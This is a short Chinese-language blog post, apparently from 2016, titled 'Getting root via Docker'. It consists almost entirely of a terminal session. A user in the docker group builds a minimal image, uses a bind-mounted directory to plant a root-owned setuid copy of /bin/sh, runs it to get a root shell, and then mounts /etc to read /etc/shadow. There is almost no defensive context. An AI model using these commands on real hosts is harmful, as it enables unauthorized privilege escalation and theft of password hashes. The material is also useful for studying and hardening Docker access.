MENU

获取 Docker 的 Root

September 20, 2016 • Security

获取 Docker 的 Root

user 必须在 docker 用户组中

ek@victum:~/docker-test$ id  
uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker)

ek@victum:~$ mkdir docker-test  
ek@victum:~$ cd docker-test

ek@victum:~$ cat > Dockerfile  
FROM debian:wheezy

ENV WORKDIR /stuff

RUN mkdir -p $WORKDIR

VOLUME [ $WORKDIR ]

WORKDIR $WORKDIR  
<< EOF

ek@victum:~$ docker build -t my-docker-image .  
ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \  
'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh'  
./sh
whoami  
# root

ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow' 
Tags: docker, Root
Archives QR Code
QR Code for this page
Tipping QR Code